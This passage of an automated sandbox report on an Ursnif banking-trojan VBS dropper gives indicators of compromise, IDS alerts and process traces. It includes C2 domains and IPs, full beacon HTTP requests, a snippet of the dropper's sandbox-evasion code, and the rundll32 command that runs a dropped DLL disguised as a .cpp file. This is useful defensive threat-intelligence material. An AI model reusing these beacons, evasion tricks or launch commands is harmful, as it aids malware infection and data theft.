            185.251.90.253sample.vbsGet hashmaliciousBrowse
              345678.vbsGet hashmaliciousBrowse
                start[526268].vbsGet hashmaliciousBrowse
                  URS8.VBSGet hashmaliciousBrowse
                    documentation_446618.vbsGet hashmaliciousBrowse
                      start_information[754877].vbsGet hashmaliciousBrowse
                        start[873316].vbsGet hashmaliciousBrowse
                          documentation[979729].vbsGet hashmaliciousBrowse
                            run_documentation[820479].vbsGet hashmaliciousBrowse
                              run[476167].vbsGet hashmaliciousBrowse
                                run_presentation[645872].vbsGet hashmaliciousBrowse
                                  documentation[979729].vbsGet hashmaliciousBrowse

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    atl.bigbigpoppa.comsample.vbsGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    345678.vbsGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    start[526268].vbsGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    URS8.VBSGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    documentation_446618.vbsGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    start_information[754877].vbsGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    start[873316].vbsGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    documentation[979729].vbsGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    run_documentation[820479].vbsGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    run[476167].vbsGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    run_presentation[645872].vbsGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    documentation[979729].vbsGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    pop.urlovedstuff.comURS8.VBSGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    documentation[979729].vbsGet hashmaliciousBrowse
                                    • 185.251.90.253

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    SPRINTHOSTRUsample.vbsGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    345678.vbsGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    start[526268].vbsGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    ZaRfpqeOYY.apkGet hashmaliciousBrowse
                                    • 141.8.192.169
                                    URS8.VBSGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    h4AjR43abb.exeGet hashmaliciousBrowse
                                    • 185.251.88.208
                                    documentation_446618.vbsGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    start_information[754877].vbsGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    dAmDdz0YVv.exeGet hashmaliciousBrowse
                                    • 185.251.88.208
                                    start[873316].vbsGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    documentation[979729].vbsGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    run_documentation[820479].vbsGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    run[476167].vbsGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    run_presentation[645872].vbsGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    yXf9mhlpKV.exeGet hashmaliciousBrowse
                                    • 185.251.88.208
                                    mgdL2TD6Dg.exeGet hashmaliciousBrowse
                                    • 185.251.88.208
                                    documentation[979729].vbsGet hashmaliciousBrowse
                                    • 185.251.90.253
                                    Pi2KyLAg44.exeGet hashmaliciousBrowse
                                    • 185.251.88.208
                                    oClF50dZRG.exeGet hashmaliciousBrowse
                                    • 185.251.88.208
                                    2K5KXrsoLH.exeGet hashmaliciousBrowse
                                    • 185.251.88.208

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    C:\Users\user\AppData\Local\Temp\fum.cppsample.vbsGet hashmaliciousBrowse
                                      345678.vbsGet hashmaliciousBrowse
                                        start[526268].vbsGet hashmaliciousBrowse

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Temp\adobe.url
                                          Process:C:\Windows\System32\wscript.exe
                                          File Type:MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):108
                                          Entropy (8bit):4.699454908123665
                                          Encrypted:false
                                          SSDEEP:3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
                                          MD5:99D9EE4F5137B94435D9BF49726E3D7B
                                          SHA1:4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
                                          SHA-256:F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
                                          SHA-512:7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview: [{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..
                                          C:\Users\user\AppData\Local\Temp\fum.cpp
                                          Process:C:\Windows\System32\wscript.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):387072
                                          Entropy (8bit):6.617827225958404
                                          Encrypted:false
                                          SSDEEP:6144:kZv2xLg5Ema5+kMLdcW2Ipsk0AOIjlllll/lllllWQO+XK+Mtw:kn5AUkaqIpWylllll/lllll7O+XLMtw
                                          MD5:D48EBF7B31EDDA518CA13F71E876FFB3
                                          SHA1:C72880C38C6F1A013AA52D032FC712DC63FE29F1
                                          SHA-256:8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
                                          SHA-512:59CBBD4ADA4F51650380989A6A024600BB67982255E9F8FFBED14D3A723471B02DAF53A0A05B2E6664FF35CB4C224F9B209FB476D6709A7B33F0A9C060973FB8
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 13%
                                          Joe Sandbox View:
                                          • Filename: sample.vbs, Detection: malicious, Browse
                                          • Filename: 345678.vbs, Detection: malicious, Browse
                                          • Filename: start[526268].vbs, Detection: malicious, Browse
                                          Reputation:low
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|...8st.8st.8st....st...9st...#st...+st.8su..st...2st...?st...9st...st...9st...9st.Rich8st.........................PE..L......Y...........!.....,..........9........@......................................%O....@.................................p...d................................%..`...T...............................@............@...............................text....*.......,.................. ..`.rdata...~...@.......0..............@..@.data...............................@....gfids..............................@..@.reloc...%.......&..................@..B................................................................................................................................................................................................................................................................................................

                                          Static File Info

                                          General

                                          File type:ASCII text, with very long lines, with CRLF line terminators
                                          Entropy (8bit):4.847598444077791
                                          TrID:
                                            File name:start[2021.09.09_15-26].vbs
                                            File size:1393062
                                            MD5:3959f76d91c30f3c14916f80a6c4cf23
                                            SHA1:2c918bff7f9073762308af3876777afc8507e3a8
                                            SHA256:1d02060d7493d25e46e7cdf76fc05aa6c80493f40db75d48700f1eb17431191d
                                            SHA512:5e74bc0322cbec0d955395f9cb43345bc6d40c2ead457abf5a83a859097327220d7d23d73e8f9a4bbe967a5b73d01a5e522d090f1bcd39cb3f168b4a9a7a14fd
                                            SSDEEP:12288:SfCepvwq9BTH3FEN9cy59WSpU9lAR4lYtE9E5rf99bh:ipvp9BT1U9cyjUAvmEZbh
                                            File Content Preview:IHGsfsedgfssd = Timer()..For hjdHJGASDF = 1 to 7..WScript.Sleep 1000:..Next..frjekgJHKasd = Timer()..if frjekgJHKasd - IHGsfsedgfssd < 5 Then..Do: KJHSGDflkjsd = 4: Loop..End if ..const VSE = 208..const Aeq = 94..pgoTH = Array(UGM,DP,wy,2,yt,2,2,2,vy,2,2,

                                            File Icon

                                            Icon Hash:e8d69ece869a9ec4

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            09/10/21-13:52:04.105913TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4978980192.168.2.3185.251.90.253
                                            09/10/21-13:52:04.105913TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4978980192.168.2.3185.251.90.253
                                            09/10/21-13:52:25.037475TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4979080192.168.2.3185.251.90.253
                                            09/10/21-13:52:25.037475TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4979080192.168.2.3185.251.90.253
                                            09/10/21-13:52:46.068609TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4979180192.168.2.3185.251.90.253
                                            09/10/21-13:52:46.068609TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4979180192.168.2.3185.251.90.253

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Sep 10, 2021 13:52:04.054955006 CEST4978980192.168.2.3185.251.90.253
                                            Sep 10, 2021 13:52:04.104650021 CEST8049789185.251.90.253192.168.2.3
                                            Sep 10, 2021 13:52:04.104789972 CEST4978980192.168.2.3185.251.90.253
                                            Sep 10, 2021 13:52:04.105912924 CEST4978980192.168.2.3185.251.90.253
                                            Sep 10, 2021 13:52:04.196993113 CEST8049789185.251.90.253192.168.2.3
                                            Sep 10, 2021 13:52:04.548911095 CEST8049789185.251.90.253192.168.2.3
                                            Sep 10, 2021 13:52:04.548996925 CEST4978980192.168.2.3185.251.90.253
                                            Sep 10, 2021 13:52:04.549251080 CEST4978980192.168.2.3185.251.90.253
                                            Sep 10, 2021 13:52:04.600912094 CEST8049789185.251.90.253192.168.2.3
                                            Sep 10, 2021 13:52:24.987175941 CEST4979080192.168.2.3185.251.90.253
                                            Sep 10, 2021 13:52:25.036384106 CEST8049790185.251.90.253192.168.2.3
                                            Sep 10, 2021 13:52:25.036495924 CEST4979080192.168.2.3185.251.90.253
                                            Sep 10, 2021 13:52:25.037475109 CEST4979080192.168.2.3185.251.90.253
                                            Sep 10, 2021 13:52:25.128510952 CEST8049790185.251.90.253192.168.2.3
                                            Sep 10, 2021 13:52:25.510382891 CEST8049790185.251.90.253192.168.2.3
                                            Sep 10, 2021 13:52:25.511292934 CEST4979080192.168.2.3185.251.90.253
                                            Sep 10, 2021 13:52:25.511434078 CEST4979080192.168.2.3185.251.90.253
                                            Sep 10, 2021 13:52:25.559459925 CEST8049790185.251.90.253192.168.2.3
                                            Sep 10, 2021 13:52:46.016597986 CEST4979180192.168.2.3185.251.90.253
                                            Sep 10, 2021 13:52:46.067687988 CEST8049791185.251.90.253192.168.2.3
                                            Sep 10, 2021 13:52:46.067878962 CEST4979180192.168.2.3185.251.90.253
                                            Sep 10, 2021 13:52:46.068608999 CEST4979180192.168.2.3185.251.90.253
                                            Sep 10, 2021 13:52:46.161114931 CEST8049791185.251.90.253192.168.2.3
                                            Sep 10, 2021 13:52:46.509069920 CEST8049791185.251.90.253192.168.2.3
                                            Sep 10, 2021 13:52:46.509210110 CEST4979180192.168.2.3185.251.90.253
                                            Sep 10, 2021 13:52:46.509423971 CEST4979180192.168.2.3185.251.90.253
                                            Sep 10, 2021 13:52:46.558790922 CEST8049791185.251.90.253192.168.2.3

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Sep 10, 2021 13:49:23.192042112 CEST5062053192.168.2.38.8.8.8
                                            Sep 10, 2021 13:49:23.222920895 CEST53506208.8.8.8192.168.2.3
                                            Sep 10, 2021 13:49:24.919645071 CEST6493853192.168.2.38.8.8.8
                                            Sep 10, 2021 13:49:24.964853048 CEST53649388.8.8.8192.168.2.3
                                            Sep 10, 2021 13:49:41.876200914 CEST6015253192.168.2.38.8.8.8
                                            Sep 10, 2021 13:49:41.917144060 CEST53601528.8.8.8192.168.2.3
                                            Sep 10, 2021 13:49:59.155482054 CEST5754453192.168.2.38.8.8.8
                                            Sep 10, 2021 13:49:59.188512087 CEST53575448.8.8.8192.168.2.3
                                            Sep 10, 2021 13:50:01.517759085 CEST5598453192.168.2.38.8.8.8
                                            Sep 10, 2021 13:50:01.558590889 CEST53559848.8.8.8192.168.2.3
                                            Sep 10, 2021 13:50:35.024283886 CEST6418553192.168.2.38.8.8.8
                                            Sep 10, 2021 13:50:35.064757109 CEST53641858.8.8.8192.168.2.3
                                            Sep 10, 2021 13:50:36.346772909 CEST6511053192.168.2.38.8.8.8
                                            Sep 10, 2021 13:50:36.389978886 CEST53651108.8.8.8192.168.2.3
                                            Sep 10, 2021 13:51:46.740211964 CEST5836153192.168.2.38.8.8.8
                                            Sep 10, 2021 13:51:46.790366888 CEST53583618.8.8.8192.168.2.3
                                            Sep 10, 2021 13:51:49.073030949 CEST6349253192.168.2.38.8.8.8
                                            Sep 10, 2021 13:51:49.124716043 CEST53634928.8.8.8192.168.2.3
                                            Sep 10, 2021 13:51:49.856499910 CEST6083153192.168.2.38.8.8.8
                                            Sep 10, 2021 13:51:49.889383078 CEST53608318.8.8.8192.168.2.3
                                            Sep 10, 2021 13:51:50.329174995 CEST6010053192.168.2.38.8.8.8
                                            Sep 10, 2021 13:51:50.376293898 CEST53601008.8.8.8192.168.2.3
                                            Sep 10, 2021 13:51:50.810614109 CEST5319553192.168.2.38.8.8.8
                                            Sep 10, 2021 13:51:50.841372013 CEST53531958.8.8.8192.168.2.3
                                            Sep 10, 2021 13:51:51.332108974 CEST5014153192.168.2.38.8.8.8
                                            Sep 10, 2021 13:51:51.369879961 CEST53501418.8.8.8192.168.2.3
                                            Sep 10, 2021 13:51:51.977974892 CEST5302353192.168.2.38.8.8.8
                                            Sep 10, 2021 13:51:52.004426003 CEST53530238.8.8.8192.168.2.3
                                            Sep 10, 2021 13:51:52.649060965 CEST4956353192.168.2.38.8.8.8
                                            Sep 10, 2021 13:51:52.675614119 CEST53495638.8.8.8192.168.2.3
                                            Sep 10, 2021 13:51:53.461781979 CEST5135253192.168.2.38.8.8.8
                                            Sep 10, 2021 13:51:53.495738983 CEST53513528.8.8.8192.168.2.3
                                            Sep 10, 2021 13:51:54.330473900 CEST5934953192.168.2.38.8.8.8
                                            Sep 10, 2021 13:51:54.379067898 CEST53593498.8.8.8192.168.2.3
                                            Sep 10, 2021 13:52:03.637804985 CEST5708453192.168.2.38.8.8.8
                                            Sep 10, 2021 13:52:04.017317057 CEST53570848.8.8.8192.168.2.3
                                            Sep 10, 2021 13:52:24.674542904 CEST5882353192.168.2.38.8.8.8
                                            Sep 10, 2021 13:52:24.976217031 CEST53588238.8.8.8192.168.2.3
                                            Sep 10, 2021 13:52:45.707376957 CEST5756853192.168.2.38.8.8.8
                                            Sep 10, 2021 13:52:46.013231993 CEST53575688.8.8.8192.168.2.3
                                            Sep 10, 2021 13:53:06.561090946 CEST5054053192.168.2.38.8.8.8
                                            Sep 10, 2021 13:53:06.865139961 CEST53505408.8.8.8192.168.2.3

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Sep 10, 2021 13:52:03.637804985 CEST192.168.2.38.8.8.80x7952Standard query (0)atl.bigbigpoppa.comA (IP address)IN (0x0001)
                                            Sep 10, 2021 13:52:24.674542904 CEST192.168.2.38.8.8.80xf4a6Standard query (0)pop.urlovedstuff.comA (IP address)IN (0x0001)
                                            Sep 10, 2021 13:52:45.707376957 CEST192.168.2.38.8.8.80xf1f6Standard query (0)atl.bigbigpoppa.comA (IP address)IN (0x0001)
                                            Sep 10, 2021 13:53:06.561090946 CEST192.168.2.38.8.8.80x7fa9Standard query (0)pop.urlovedstuff.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Sep 10, 2021 13:52:04.017317057 CEST8.8.8.8192.168.2.30x7952No error (0)atl.bigbigpoppa.com185.251.90.253A (IP address)IN (0x0001)
                                            Sep 10, 2021 13:52:24.976217031 CEST8.8.8.8192.168.2.30xf4a6No error (0)pop.urlovedstuff.com185.251.90.253A (IP address)IN (0x0001)
                                            Sep 10, 2021 13:52:46.013231993 CEST8.8.8.8192.168.2.30xf1f6No error (0)atl.bigbigpoppa.com185.251.90.253A (IP address)IN (0x0001)
                                            Sep 10, 2021 13:53:06.865139961 CEST8.8.8.8192.168.2.30x7fa9No error (0)pop.urlovedstuff.com185.251.90.253A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • atl.bigbigpoppa.com
                                            • pop.urlovedstuff.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.349789185.251.90.25380C:\Windows\SysWOW64\rundll32.exe
                                            TimestampkBytes transferredDirectionData
                                            Sep 10, 2021 13:52:04.105912924 CEST5011OUTGET /R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT7aFfMHddlV3_2FIkW8P/ayLC_2Bshelva/2X_2Bg56/7jrpWKChL2MGyrBCg5dLHkp/afoZMxsy1T/Wp7_2FPeXCx8Q_2BZ/qOUTFrHwatL_/2B9CZYfq_2B/hvctvVLoqJu_2B/vpIx1k_2FVAj6zT_2F3t3/6fHnbpgCWlIc40kF/GNgoS4_2BmIaDcC/8SXP0dHgwB95tBuoyP/x_2BcO7Jg/2OPTdoZOpI7RlGA8Y18Y/JYFZfFiYFwCa3nBrqzw/H_2B8_2FkkexIGmoFzmcpf/7smS06LtDXKEe/c HTTP/1.1
                                            Cache-Control: no-cache
                                            Connection: Keep-Alive
                                            Pragma: no-cache
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                            Host: atl.bigbigpoppa.com
                                            Sep 10, 2021 13:52:04.548911095 CEST5011INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Fri, 10 Sep 2021 11:52:04 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Content-Length: 146
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.349790185.251.90.25380C:\Windows\SysWOW64\rundll32.exe
                                            TimestampkBytes transferredDirectionData
                                            Sep 10, 2021 13:52:25.037475109 CEST5012OUTGET /FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cf/HmT9c0wd9uTFE/mjIXEmZg/7w1x_2BJ7UrOUMBuwkzmQs_/2B_2B90mhB/GdhMF2xI5ZZQZOsRZ/w8ERaF_2FKjr/oJe_2BmPqxj/UioALST3UPW_2B/x25T0SA4ncGBrSmoWvhyD/GJA93v_2Bs5_2FOu/bRGYPwsER1HateV/PYXudbMJvsQ83oCtuH/3_2FsJC5W/WltZ3WhV77sZrxWGfR6s/bNzIeDiXMV8LnHFQlB1/BK37js8oH2L1YJRuiB3U5s/fOdLI1WLm_2Bt/WCukq3AFEXzr/kh2 HTTP/1.1
                                            Cache-Control: no-cache
                                            Connection: Keep-Alive
                                            Pragma: no-cache
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                            Host: pop.urlovedstuff.com
                                            Sep 10, 2021 13:52:25.510382891 CEST5013INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Fri, 10 Sep 2021 11:52:25 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Content-Length: 146
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.349791185.251.90.25380C:\Windows\SysWOW64\rundll32.exe
                                            TimestampkBytes transferredDirectionData
                                            Sep 10, 2021 13:52:46.068608999 CEST5014OUTGET /0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d7t6b51CsWR3vpDy/zU3pR9vjY/lPgvi3S86qplQEaQf_2B/jxDYlqt8BjtcOWY_2FN/ohwhXl17Lh66734_2Fqn_2/FgCM3Tnuck0nF/J0S1YKxS/oTav10uGKUAnWla7FsZqe_2/BIXpQqvfaR/nMso0hdyU8dnVmjyD/LLoIt20KVY7z/9GJ5tvt7Ozs/NXB1gCveQulFzL/ZrjIdUFvH1uWGi_2BuvX_/2BGZEq0uPSkXlrhP/QwzrBUc1U9Q1ZY4/HzIgE26R/E HTTP/1.1
                                            Cache-Control: no-cache
                                            Connection: Keep-Alive
                                            Pragma: no-cache
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                            Host: atl.bigbigpoppa.com
                                            Sep 10, 2021 13:52:46.509069920 CEST5014INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Fri, 10 Sep 2021 11:52:46 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Content-Length: 146
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                            Code Manipulations

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Start time:13:48:57
                                            Start date:10/09/2021
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[2021.09.09_15-26].vbs'
                                            Imagebase:0x7ff6d0c20000
                                            File size:163840 bytes
                                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:13:51:29
                                            Start date:10/09/2021
                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                            Imagebase:0x7ff66d5c0000
                                            File size:488448 bytes
                                            MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:13:51:29
                                            Start date:10/09/2021
                                            Path:C:\Windows\System32\rundll32.exe
                                            Wow64 process (32bit):false
                                            Commandline:rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                                            Imagebase:0x7ff665ad0000
                                            File size:69632 bytes
                                            MD5 hash:73C519F050C20580F8A62C849D49215A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:13:51:30
                                            Start date:10/09/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                                            Imagebase:0x1370000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
                                            Reputation:high

                                            General

                                            Start time:13:52:02
                                            Start date:10/09/2021
                                            Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                            Imagebase:0xec0000
                                            File size:426496 bytes
                                            MD5 hash:7AB59579BA91115872D6E51C54B9133B
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            Disassembly

                                            Code Analysis

                                            Reset < >